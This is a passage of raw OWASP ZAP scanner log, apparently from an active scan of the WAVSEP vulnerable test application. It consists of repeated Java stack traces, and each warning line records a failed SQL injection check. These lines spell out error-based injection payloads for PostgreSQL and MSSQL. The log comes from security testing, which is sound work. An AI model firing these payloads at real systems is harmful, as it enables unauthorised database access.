Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680233 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 2493=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2493=2493) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4927=4927] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 2493=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2493=2493) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4927=4927 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680234 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8737=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 8737=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680235 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 8366=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8366=8366) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('zaUm'='zaUm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 8366=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8366=8366) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('zaUm'='zaUm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680236 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 1366=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1366=1366) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'AsPy'='AsPy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 1366=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1366=1366) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'AsPy'='AsPy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680237 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 4030=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4030=4030) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 4030=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4030=4030) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680238 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7329=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7329=7329) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ITpy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7329=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7329=7329) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- ITpy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680239 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 6888=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6888=6888) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3025=3025] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 6888=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6888=6888) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3025=3025 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680240 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7817=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7817=7817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7817=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7817=7817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680242 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 4852=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4852=4852) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('cWWD'='cWWD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 4852=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4852=4852) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('cWWD'='cWWD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680244 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 2040=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2040=2040) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'IBhj'='IBhj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 2040=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2040=2040) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'IBhj'='IBhj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680245 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 9911=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9911=9911) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 9911=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9911=9911) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680246 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7098=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7098=7098) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- ENiz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7098=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7098=7098) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- ENiz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 